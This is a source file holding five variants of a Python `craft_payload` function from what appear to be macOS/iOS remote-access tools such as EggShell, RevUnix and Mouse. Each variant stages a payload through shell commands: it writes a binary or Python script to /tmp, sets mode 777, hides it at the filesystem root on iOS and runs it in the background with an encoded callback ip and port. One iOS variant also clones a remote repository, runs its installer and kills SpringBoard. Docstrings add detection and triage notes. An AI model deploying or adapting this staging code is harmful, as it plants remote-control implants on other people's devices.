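def craft_payload(self, device_arch):
    """Return the shell instructions and binary payload for a connecting device.

    A pre-built binary is read from ``resources/`` according to
    ``device_arch`` and paired with the one-line shell command that stages
    and starts it. The callback settings (``self.host``, ``self.port``,
    ``self.debug``) are JSON-encoded, passed through ``h.b64`` (presumably
    base64; the helper is not shown here) and appended as the only argument.

    What the command strings below leave on the device, for detection and
    triage: a mode-777 file under ``/private/tmp`` (macOS), or under ``/tmp``
    then moved to ``/.mpl`` at the filesystem root (iOS), started in the
    background with stderr discarded. The encoded settings are passed as a
    process argument, so they are normally visible in process listings and
    can be decoded to recover the configured ip and port.

    Args:
        device_arch: Architecture string reported by the device; compared
            against ``self.macos_architectures`` and
            ``self.ios_architectures``.

    Returns:
        An ``(instructions, payload)`` tuple, or ``None`` when the host or
        port is unset or the architecture is not recognized (the error is
        reported through ``h.info_error``).
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        h.info_error("Local Host is not set")
        return
    if not self.port:
        h.info_error("Local Port is not set")
        return
    payload_parameter = h.b64(
        json.dumps({"ip": self.host, "port": self.port, "debug": self.debug}))
    if device_arch in self.macos_architectures:
        self.verbose_print("Detected macOS")
        # Context manager closes the handle even if read() raises.
        with open("resources/mplmacos", "rb") as f:
            payload = f.read()
        # save to tmp
        instructions = (
            "cat >/private/tmp/tmpmpl;"
            + "chmod 777 /private/tmp/tmpmpl;"
            + "mv /private/tmp/tmpmpl /private/tmp/mpl;"
            + "/private/tmp/mpl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        self.verbose_print("Detected iOS")
        with open("resources/mplios", "rb") as f:
            payload = f.read()
        instructions = (
            "cat >/tmp/tmpmpl;"
            + "chmod 777 /tmp/tmpmpl;"
            + "mv /tmp/tmpmpl /.mpl;"
            + "/.mpl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    else:
        h.info_error("The device is not recognized!")
        return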
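def craft_payload(self, device_arch):
    """Return the shell instructions and payload for a connecting device.

    Reads a pre-built binary (macOS, iOS) or a Python script (any other
    ``device_arch``) from ``resources/`` and pairs it with the one-line
    shell command that stages and starts it. The callback settings
    (``self.host``, ``self.port`` and a hard-coded ``"debug": 1``) are
    JSON-encoded, passed through ``h.b64`` (presumably base64; the helper is
    not shown here) and appended as the only argument.

    What the command strings below leave on the device, for detection and
    triage: a mode-777 file under ``/private/tmp`` (macOS) or ``/tmp``
    (iOS), started in the background with stderr discarded, or
    ``/tmp/rupl.py`` run with ``python`` in the background. The encoded
    settings are passed as a process argument, so they are normally visible
    in process listings and can be decoded to recover the configured ip and
    port.

    NOTE(review): the nesting of the fallback branch was reconstructed from
    a whitespace-collapsed listing; confirm against the upstream file.

    Args:
        device_arch: Architecture string reported by the device; compared
            against ``self.macos_architectures`` and
            ``self.ios_architectures``.

    Returns:
        An ``(instructions, payload)`` tuple.

    Raises:
        ValueError: If ``self.host`` or ``self.port`` is unset, or if
            ``self.is_multi`` is False and ``device_arch`` contains
            ``"GET / HTTP/1.1"`` (what arrived looks like an HTTP request,
            not an architecture string).
    """
    if not self.host:
        raise ValueError(
            'Server Host IP Not Set. Please Set A Valid Host IP.')
    if not self.port:
        raise ValueError(
            'Server Port Number Not Set. Please Set A Valid Port Number.')
    payload_parameter = h.b64(
        json.dumps({"ip": self.host, "port": self.port, "debug": 1}))
    if device_arch in self.macos_architectures:
        # `== False` is kept as written: an is_multi of None must not print,
        # which `not self.is_multi` would change.
        if self.is_multi == False:
            h.info_general("Detected MacOS!")
        # Context manager closes the handle even if read() raises.
        with open("resources/ruplmacos", "rb") as f:
            payload = f.read()
        instructions = (
            "cat >/private/tmp/tmprupl;"
            + "chmod 777 /private/tmp/tmprupl;"
            + "mv /private/tmp/tmprupl /private/tmp/rupl;"
            + "/private/tmp/rupl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        if self.is_multi == False:
            h.info_general("Detected iOS!")
        with open("resources/ruplios", "rb") as f:
            payload = f.read()
        instructions = (
            "cat >/tmp/tmprupl;"
            + "chmod 777 /tmp/tmprupl;"
            + "mv /tmp/tmprupl /tmp/rupl;"
            + "/tmp/rupl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    else:
        if self.is_multi == False:
            if device_arch == "Linux":
                h.info_general("Detected Linux")
            elif "GET / HTTP/1.1" in device_arch:
                raise ValueError(
                    "RevUnix does not exploit Safari Browser. RevUnix is a payload creation tool.\n Please look at the README.md file"
                )
            else:
                h.info_general(
                    "Device Unrecognized... \nTrying Python Payload...")
        with open("resources/rupl.py", "rb") as f:
            payload = f.read()
        # Command string kept verbatim; the chmod names /var/tmp while the
        # script is written to and run from /tmp.
        instructions = (
            "cat >/tmp/rupl.py;"
            + "chmod 777 /var/tmp/rupl.py;"
            + "python /tmp/rupl.py " + payload_parameter + " &\n"
        )
        return (instructions, payload)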
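def craft_payload(self, device_arch):
    """Return the shell instructions and payload for a connecting device.

    Reads a pre-built binary (macOS, iOS) or a Python script (any other
    ``device_arch``) from ``resources/`` and pairs it with the one-line
    shell command that stages and starts it. The callback settings
    (``self.host``, ``self.port``, ``self.debug``) are JSON-encoded, passed
    through ``h.b64`` (presumably base64; the helper is not shown here) and
    appended as the only argument.

    What the command strings below leave on the device, for detection and
    triage: a mode-777 file under ``/private/tmp`` (macOS), or under ``/tmp``
    then moved to ``/.mpl`` at the filesystem root (iOS), started in the
    background with stderr discarded, or ``/tmp/mpl.py`` run with ``python``.
    The iOS command additionally clones a repository over the network, runs
    its ``install.sh`` and restarts SpringBoard, so outbound git traffic and
    a visible respring accompany it. The encoded settings are passed as a
    process argument, so they are normally visible in process listings and
    can be decoded to recover the configured ip and port.

    Args:
        device_arch: Architecture string reported by the device; compared
            against ``self.macos_architectures`` and
            ``self.ios_architectures``.

    Returns:
        An ``(instructions, payload)`` tuple.

    Raises:
        ValueError: If ``self.host`` or ``self.port`` is unset, or if
            ``device_arch`` contains ``"GET / HTTP/1.1"`` (what arrived
            looks like an HTTP request, not an architecture string).
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        raise ValueError('Server host not set')
    if not self.port:
        raise ValueError('Server port not set')
    payload_parameter = h.b64(
        json.dumps({"ip": self.host, "port": self.port, "debug": self.debug}))
    if device_arch in self.macos_architectures:
        self.verbose_print("Detected macOS")
        # Context manager closes the handle even if read() raises.
        with open("resources/mplmacos", "rb") as f:
            payload = f.read()
        # save to tmp
        instructions = (
            "cat >/private/tmp/tmpmpl;"
            + "chmod 777 /private/tmp/tmpmpl;"
            + "mv /private/tmp/tmpmpl /private/tmp/mpl;"
            + "/private/tmp/mpl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        self.verbose_print("Detected iOS")
        with open("resources/mplios", "rb") as f:
            payload = f.read()
        instructions = (
            "cat >/tmp/tmpmpl;"
            + "chmod 777 /tmp/tmpmpl;"
            + "mv /tmp/tmpmpl /.mpl;"
            + "rm -r mouse;"
            + "git clone https://github.com/entynetproject/mouse.git;"
            + "cd mouse/substrate && chmod +x install.sh && ./install.sh --ignore-package && killall SpringBoard;"
            + "/.mpl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    else:
        if device_arch == "Linux":
            self.verbose_print("Detected Linux")
        elif "GET / HTTP/1.1" in device_arch:
            raise ValueError(
                "MPL does not exploit safari, it is a payload loader.")
        else:
            h.info_general("Device unrecognized, trying python payload...")
        with open("resources/mpl.py", "rb") as f:
            payload = f.read()
        # Command string kept verbatim; the chmod names /var/tmp while the
        # script is written to and run from /tmp.
        instructions = (
            "cat >/tmp/mpl.py;"
            + "chmod 777 /var/tmp/mpl.py;"
            + "python /tmp/mpl.py " + payload_parameter + " &\n"
        )
        return (instructions, payload)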
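def craft_payload(self, device_arch):
    """Return the shell instructions and payload for a connecting device.

    Reads a pre-built binary (macOS, iOS) or a Python script (any other
    ``device_arch``) from ``resources/`` and pairs it with the one-line
    shell command that stages and starts it. The callback settings
    (``self.host``, ``self.port``, ``self.debug``) are JSON-encoded, passed
    through ``h.b64`` (presumably base64; the helper is not shown here) and
    appended as the only argument.

    What the command strings below leave on the device, for detection and
    triage: a mode-777 file under ``/private/tmp`` (macOS), or under ``/tmp``
    then moved to ``/.espl`` at the filesystem root (iOS), started in the
    background with stderr discarded, or ``/tmp/espl.py`` run with
    ``python`` in the background. The encoded settings are passed as a
    process argument, so they are normally visible in process listings and
    can be decoded to recover the configured ip and port.

    Args:
        device_arch: Architecture string reported by the device; compared
            against ``self.macos_architectures`` and
            ``self.ios_architectures``.

    Returns:
        An ``(instructions, payload)`` tuple.

    Raises:
        ValueError: If ``self.host`` or ``self.port`` is unset, or if
            ``device_arch`` contains ``"GET / HTTP/1.1"`` (what arrived
            looks like an HTTP request, not an architecture string).
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        raise ValueError('Server host not set')
    if not self.port:
        raise ValueError('Server port not set')
    payload_parameter = h.b64(
        json.dumps({"ip": self.host, "port": self.port, "debug": self.debug}))
    if device_arch in self.macos_architectures:
        self.verbose_print("Detected macOS")
        # Context manager closes the handle even if read() raises.
        with open("resources/esplmacos", "rb") as f:
            payload = f.read()
        # save to tmp
        instructions = (
            "cat >/private/tmp/tmpespl;"
            + "chmod 777 /private/tmp/tmpespl;"
            + "mv /private/tmp/tmpespl /private/tmp/espl;"
            + "/private/tmp/espl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        self.verbose_print("Detected iOS")
        with open("resources/esplios", "rb") as f:
            payload = f.read()
        instructions = (
            "cat >/tmp/tmpespl;"
            + "chmod 777 /tmp/tmpespl;"
            + "mv /tmp/tmpespl /.espl;"
            + "/.espl " + payload_parameter + " 2>/dev/null &\n"
        )
        return (instructions, payload)
    else:
        if device_arch == "Linux":
            self.verbose_print("Detected Linux")
        elif "GET / HTTP/1.1" in device_arch:
            raise ValueError(
                "EggShell does not exploit safari, it is a payload creation tool.\nPlease look at the README.md file"
            )
        else:
            h.info_general("Device unrecognized, trying python payload")
        with open("resources/espl.py", "rb") as f:
            payload = f.read()
        # Command string kept verbatim; the chmod names /var/tmp while the
        # script is written to and run from /tmp.
        instructions = (
            "cat >/tmp/espl.py;"
            + "chmod 777 /var/tmp/espl.py;"
            + "python /tmp/espl.py " + payload_parameter + " &\n"
        )
        return (instructions, payload)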
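def craft_payload(self, device_arch):
    """Return the shell instructions and binary payload for a connecting device.

    A pre-built binary is read from ``data/payloads/`` according to
    ``device_arch`` and paired with the one-line shell command that stages
    and starts it. The callback settings (``self.host``, ``self.port``,
    ``self.debug``) are JSON-encoded, passed through ``h.b64`` (presumably
    base64; the helper is not shown here) and appended as the only argument.

    What the command strings below leave on the device, for detection and
    triage: a mode-777 file at ``/private/tmp/mouse`` (macOS), or at
    ``/tmp/mouse`` then moved to ``/.mouse`` at the filesystem root (iOS),
    started in the background with stderr discarded. The encoded settings
    are passed as a process argument, so they are normally visible in
    process listings and can be decoded to recover the configured ip and
    port.

    Args:
        device_arch: Architecture string reported by the device; compared
            against ``self.macos_architectures`` and
            ``self.ios_architectures``.

    Returns:
        An ``(instructions, payload)`` tuple, or ``None`` when the host or
        port is unset or the architecture is not recognized (the error is
        reported through ``h.info_error``).
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        h.info_error("Local Host is not set!")
        return
    if not self.port:
        h.info_error("Local Port is not set!")
        return
    payload_parameter = h.b64(
        json.dumps({"ip": self.host, "port": self.port, "debug": self.debug}))
    if device_arch in self.macos_architectures:
        self.verbose_print("Connecting to macOS...")
        self.verbose_print("Sending macOS Payload...")
        # Context manager closes the handle even if read() raises.
        with open("data/payloads/macos", "rb") as f:
            payload = f.read()
        # save to tmp
        instructions = (
            "cat >/private/tmp/mouse;"
            + "chmod 777 /private/tmp/mouse;"
            + "/private/tmp/mouse " + payload_parameter + " 2>/dev/null &\n"
        )
        self.verbose_print("Executing macOS Payload...")
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        self.verbose_print("Connecting to iOS...")
        self.verbose_print("Sending iOS Payload...")
        with open("data/payloads/ios", "rb") as f:
            payload = f.read()
        instructions = (
            "cat >/tmp/mouse;"
            + "chmod 777 /tmp/mouse;"
            + "mv /tmp/mouse /.mouse;"
            + "/.mouse " + payload_parameter + " 2>/dev/null &\n"
        )
        self.verbose_print("Executing iOS Payload...")
        return (instructions, payload)
    else:
        h.info_error("The device is not recognized!")
        return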